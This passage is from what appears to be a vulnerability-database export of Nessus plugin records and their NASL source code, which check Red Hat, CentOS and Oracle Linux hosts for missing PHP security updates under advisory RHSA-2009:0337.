value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:0337\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"php-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-devel-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-imap-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-ldap-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-mysql-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-odbc-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-pgsql-4.3.2-51.ent\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.22.15\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:25:33", "description": "Updated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.", "edition": 29, "published": "2009-04-07T00:00:00", "title": "CentOS 3 / 4 : php (CESA-2009:0337)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "modified": "2009-04-07T00:00:00", "cpe": ["p-cpe:/a:centos:centos:php-mbstring", "p-cpe:/a:centos:centos:php-pgsql", "p-cpe:/a:centos:centos:php", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:php-ldap", "p-cpe:/a:centos:centos:php-snmp", "p-cpe:/a:centos:centos:php-gd", "p-cpe:/a:centos:centos:php-mysql", "p-cpe:/a:centos:centos:php-devel", "p-cpe:/a:centos:centos:php-odbc", "p-cpe:/a:centos:centos:php-imap", "p-cpe:/a:centos:centos:php-pear", "p-cpe:/a:centos:centos:php-domxml", "p-cpe:/a:centos:centos:php-xmlrpc", "p-cpe:/a:centos:centos:php-ncurses", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2009-0337.NASL", "href": "https://www.tenable.com/plugins/nessus/36089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0337 and \n# CentOS Errata and Security Advisory 2009:0337 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36089);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_bugtraq_id(30649, 31612, 32948, 33002, 33542);\n script_xref(name:\"RHSA\", value:\"2009:0337\");\n\n script_name(english:\"CentOS 3 / 4 : php (CESA-2009:0337)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015718.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?736a5cf1\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015719.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27731545\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015722.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f83bf8a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015723.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?116e646e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015806.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb1c4175\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015807.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?526df04d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-devel-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-imap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-ldap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-mysql-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-odbc-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-pgsql-4.3.2-51.ent\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"php-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-devel-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-domxml-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-gd-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-imap-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ldap-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mbstring-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mysql-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ncurses-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-odbc-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pear-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pgsql-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-snmp-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-xmlrpc-4.3.9-3.22.15\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:24", "description": "From Red Hat Security Advisory 2009:0337 :\n\nUpdated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.", "edition": 27, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 : php (ELSA-2009-0337)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-domxml", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-imap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-ncurses", "p-cpe:/a:oracle:linux:php-snmp", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-mysql", "p-cpe:/a:oracle:linux:php-xmlrpc", "p-cpe:/a:oracle:linux:php-pear", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-pgsql"], "id": "ORACLELINUX_ELSA-2009-0337.NASL", "href": "https://www.tenable.com/plugins/nessus/67817", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:0337 and \n# Oracle Linux Security Advisory ELSA-2009-0337 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67817);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_bugtraq_id(30649, 31612, 32948, 33002, 33542);\n script_xref(name:\"RHSA\", value:\"2009:0337\");\n\n script_name(english:\"Oracle Linux 3 / 4 : php (ELSA-2009-0337)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:0337 :\n\nUpdated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-April/000951.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-April/000952.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-devel-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-devel-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-imap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-imap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-ldap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-ldap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-mysql-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-mysql-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-odbc-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-odbc-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-pgsql-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.2-51.ent\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"php-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-devel-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", 